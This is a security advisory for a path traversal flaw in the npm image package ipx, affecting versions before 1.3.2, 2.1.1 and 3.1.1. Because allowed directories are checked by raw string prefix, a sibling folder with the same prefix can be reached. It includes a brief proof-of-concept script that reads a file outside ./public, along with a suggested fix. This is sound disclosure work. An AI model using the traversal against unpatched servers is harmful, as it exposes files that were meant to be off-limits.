GHSA-mm3p-j368-7jcr

Suggest an improvement
Source
https://github.com/advisories/GHSA-mm3p-j368-7jcr
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/08/GHSA-mm3p-j368-7jcr/GHSA-mm3p-j368-7jcr.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-mm3p-j368-7jcr
Aliases
Published
2025-08-04T14:48:25Z
Modified
2026-09-10T03:50:27Z
Severity
  • 6.9 (Medium) CVSS_V4 - CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:H/SI:L/SA:N CVSS Calculator
Summary
IPX Allows Path Traversal via Prefix Matching Bypass
Details

Summary

The approach used to check whether a path is within allowed directories is vulnerable to path prefix bypass when the allowed directories do not end with a path separator. This occurs because the check relies on a raw string prefix comparison.

PoC

  • setup
mkdir ~/public123
move a png file under ~/public123 with name test.png
cd
npm i ipx 
  • main.js
import { createIPX, ipxFSStorage } from "ipx";

const ipx = createIPX({
  storage: ipxFSStorage({ dir: "./public" }),
});


(async () => { 
    {
        const source = await ipx("../public123/test.png"); // access file outside ./public dir because of same prefix folder
        const { data, format } = await source.process();
        console.log(format) // print image data
    }
    {
        try {
            const source = await ipx("../publi123/test.png"); // forbidden path: the prefix is not the same
            const { data, format } = await source.process();
            console.log(data)
        } catch (err) {
            console.log(err.message) // Forbidden path:
        }

    }

})()
  • node main.js
png
Forbidden path: /../publi123/test.png

Impact

Path Traversal

Possible Fix

Check if the dir ends with / (path separator) and if not, add before calling startsWith

Database specific
{
    "cwe_ids":  [
        "CWE-22"
    ],
    "github_reviewed":  true,
    "github_reviewed_at":  "2025-08-04T14:48:25Z",
    "nvd_published_at":  "2025-08-05T01:15:41Z",
    "severity":  "MODERATE"
}
References

Affected packages

npm / ipx

Package

Affected ranges

Type
SEMVER
Events
Introduced
0 Unknown introduced version / All previous versions are affected
Fixed
1.3.2

Database specific

source
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/08/GHSA-mm3p-j368-7jcr/GHSA-mm3p-j368-7jcr.json"

npm / ipx

Package

Affected ranges

Type
SEMVER
Events
Introduced
2.0.0-0
Fixed
2.1.1

Database specific

source
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/08/GHSA-mm3p-j368-7jcr/GHSA-mm3p-j368-7jcr.json"

npm / ipx

Package

Affected ranges

Type
SEMVER
Events
Introduced
3.0.0
Fixed
3.1.1

Database specific

source
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/08/GHSA-mm3p-j368-7jcr/GHSA-mm3p-j368-7jcr.json"